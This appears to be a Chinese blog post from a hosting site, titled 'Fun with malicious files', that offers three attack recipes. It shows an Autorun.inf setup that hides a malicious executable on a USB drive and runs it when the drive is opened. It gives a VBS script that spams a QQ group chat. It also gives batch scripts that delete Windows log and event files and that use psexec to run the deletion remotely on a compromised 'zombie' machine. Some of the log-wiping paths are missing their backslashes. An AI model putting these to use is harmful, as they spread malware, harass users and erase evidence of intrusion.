恶意文件小乐趣

发布时间:2020-06-10 13:02:19 作者:兰博不基尼
来源:网络 阅读:521

1、将可执行恶意文件放入U盘。并设置隐藏。

2、创建文件 Autorun.inf

3、写入内容:

[AutoRun]
OPEN=恶意文件全名
shellexecute=恶意文件全名
shell\Atuo\command=恶意文件全名

隐藏本文件。

4、当U盘插入新的设备,操作人员双击U盘图标查看U盘时,会自动运行恶意文件。


VBS脚本,QQ群聊刷屏:

新建vbs后缀文件。内容如下:

Set WshShell= WScript.CreateObject("WScript.Shell")
WshShell.AppActivate "群聊刷屏测试"
for i=1 to 10 
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next

#for i=1to 10”语句用来控制发送次数,表示发送10次


打开一个群聊天窗口并复制要发送的内容到剪贴板上,双击刚才生成的“qq.vbs”切换到群聊天窗口中,在其中可看到已自动刷屏了。


日志清除:


新建del.bat脚本

@del c:winntsystem32logfiles*.* 
@del c:winntsystem32config*.evt 
@del c:winntsystem32dtclog*.* 
@del c:winntsystem32*.log 
@del c:winntsystem32*.txt 
@del c:winnt*.txt 
@del c:winnt*.log 
@del c:del.bat

新建clean.bat


@copy del.bat 
\%1c$ 
@echo 
向肉鸡复制本机的del.bat
……OK 
@psexec 
\%1 c:del.bat 
@echo 
在肉鸡上运行del.bat
,清除日志文件……OK
推荐阅读:
  1. EXT3 MYSQL文件遭到恶意删除的解决方案
  2. 监控web站点目录下所有文件是否被恶意篡改

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

command 剪贴板 群聊

上一篇:微信转发或分享朋友圈带缩略图、标题和描述的实现方法

下一篇:配置Tomcat虚拟主机和优化Tomcat

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》